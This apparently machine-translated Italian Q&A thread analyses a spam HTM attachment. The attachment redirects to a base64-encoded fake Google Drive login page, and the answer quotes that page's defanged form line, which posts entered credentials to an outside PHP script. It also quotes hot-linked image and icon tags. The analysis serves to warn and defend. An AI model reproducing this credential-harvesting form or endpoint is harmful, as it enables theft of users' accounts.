Hai una mail di spam con un allegato htm, lo script è dannoso?

8

Oggi ho ricevuto un'email con un allegato htm, il mth contiene il seguente codice:

<html>  
    <head>
        <script>
            var url = ""
            window.location.href= url;
        </script>
    </head>
</html>

Alla variabile url è stato assegnato un valore enorme di 247251 caratteri, penso che siano caratteri un po 'inutili solo per aumentare la lunghezza dell'URL.

Non ho intenzionalmente scritto il contenuto dell'URL per evitare di non esporre alcuna minaccia alla sicurezza per gli altri. Ecco il pastebin della spazzatura a cui mi riferisco .

Se apro questo in qualsiasi browser Web, quali danni può fare?

    
posta Kaushalendra Mishra 19.12.2015 - 02:54
fonte

1 risposta

13

Che cos'è?

Ho decodificato la tua "spazzatura". Questa è la codifica base64 ed è troppo grande per essere collocata qui. Ecco il risultato decodificato: link

Questo sembra essere un allegato della pagina di accesso per Google Drive. Infatti, tutto viene rimosso da Google Drive, ad eccezione di alcuni elementi.

Questo è un tentativo di phishing.

Come puoi vedere dal numero di riga 2642 , in realtà sta tentando di inviare i dati a un server web in Russia:

<form action="hxxp://www.gladiolusfashion.ru/js/fancybox/country.php" id="signup" method="post" name="signup">

In pratica stai solo cercando di rubare i dettagli del tuo account Google. Questo è un tentativo di phishing run-of-the-mill.

Tuttavia, c'è un altro potenziale problema: un'immagine hot-linkata da U.K:

Confirm your identity.<img align="right" border="0" height="33" src="hxxp://www.bountifulbreast.co.uk/images/100Secure.jpg" width="83"></h1>

Ciò che probabilmente fa è avvisare il proprietario di quel sito Web che è stato fatto un tentativo di accedere a quella particolare immagine. Se i proprietari di tali siti Web sono uguali, sarà possibile registrare l'indirizzo IP e il tentativo di accesso. Questo potrebbe aiutarli a determinare l'efficacia dei loro attacchi di phishing. "Quante persone vedono questo contro quanti ne cadono?"

È anche possibile che il server Web per le immagini sia stato compromesso. Potrebbe essere compromesso o semplicemente collegato a caldo. È difficile da dire.

In alto, per evitare di avvisare il rilevamento phishing hot-link di Google, i phisher non avevano altra scelta se non quella di collegarsi rapidamente a un sito Web di icone gratuito per conferire l'aspetto di legittimità. Puoi vederlo sulle righe 2585 e 2586 :

<link rel="shortcut icon" href="hxxp://icons.iconarchive.com/icons/marcus-roberto/google-play/512/Google-Drive-icon.png">
<link rel="apple-touch-icon" href="hxxp://icons.iconarchive.com/icons/marcus-roberto/google-play/512/Google-Drive-icon.png">

Infine, quando invii i dati, ti invia a una pagina falsa che dice che il file richiesto non esiste. (pastebin)

TL; DR Breakdown

Questo tentativo di phishing sta cercando di fare alcune cose:

  1. All'apertura dell'allegato, tenterà di reindirizzare a una pagina con un falso login di Google Drive e tentare di indurti a inserire le tue credenziali.
  2. Se sei stato abbastanza stupido da inserire le tue credenziali, verranno inviate a uno script php situato su un server in Russia.
  3. Una volta inviato, riceverai una pagina di accesso falsa (pastebin di questo) che ti dice che il file non esiste.

Conclusione

Non preoccuparti di aprirlo. Sta cercando di farti inserire le tue credenziali.

    
risposta data 19.12.2015 - 04:52
fonte

Leggi altre domande sui tag